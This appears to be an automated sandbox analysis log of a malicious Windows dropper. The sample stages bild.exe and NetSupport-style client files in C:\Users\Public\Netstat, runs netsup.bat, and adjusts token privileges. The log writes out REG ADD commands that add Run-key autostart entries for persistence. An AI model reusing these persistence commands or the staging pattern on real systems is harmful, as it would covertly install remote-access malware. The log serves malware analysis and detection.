                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110733B07_2_110733B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_111632207_2_11163220
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110295907_2_11029590
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1102B5F07_2_1102B5F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_111674857_2_11167485
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110454F07_2_110454F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1101B7607_2_1101B760
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_111258B07_2_111258B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1101BBA07_2_1101BBA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11087C607_2_11087C60
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110700907_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110804807_2_11080480
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1115E9807_2_1115E980
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1101C9C07_2_1101C9C0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110088AB7_2_110088AB
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11050D807_2_11050D80
                                Source: C:\Users\Public\Netstat\bild.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: String function: 003DCEC0 appears 53 times
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: String function: 003DD870 appears 31 times
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: String function: 003DCDF0 appears 37 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 110B7A20 appears 43 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11146450 appears 1221 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 1109D8C0 appears 32 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5E7C70 appears 35 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11146EC0 appears 48 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 110278E0 appears 94 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5F9480 appears 54 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 1116F010 appears 74 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11029450 appears 2011 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5E7A90 appears 57 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5FF3CB appears 33 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 111603E3 appears 82 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11173663 appears 40 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 1105DD10 appears 585 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5D30A0 appears 47 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5E7D00 appears 120 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11081BB0 appears 85 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 1105DE40 appears 54 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5D6F50 appears 158 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11164010 appears 64 times
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll2 vs d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000005125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll2 vs d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                Source: classification engineClassification label: mal96.rans.evad.winEXE@14/12@1/2
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11059C50 GetLastError,FormatMessageA,LocalFree,6_2_11059C50
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,6_2_1109D440
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,6_2_1109D4D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,7_2_1109D440
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,7_2_1109D4D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,6_2_11115B70
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003D8BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_003D8BD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,6_2_11127E10
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\NetstatJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCommand line argument: *xA0_2_003DC131
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCommand line argument: *a@0_2_003DC131
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCommand line argument: sfxname0_2_003DC131
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCommand line argument: sfxstime0_2_003DC131
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCommand line argument: STARTDLG0_2_003DC131
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeReversingLabs: Detection: 57%
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile read: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe "C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe"
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exe
                                Source: unknownProcess created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
                                Source: unknownProcess created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
                                Source: unknownProcess created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exeJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile written: C:\Users\Public\Netstat\client32.iniJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic file information: File size 2138135 > 1048576
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile opened: C:\Users\Public\Netstat\msvcr100.dllJump to behavior
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
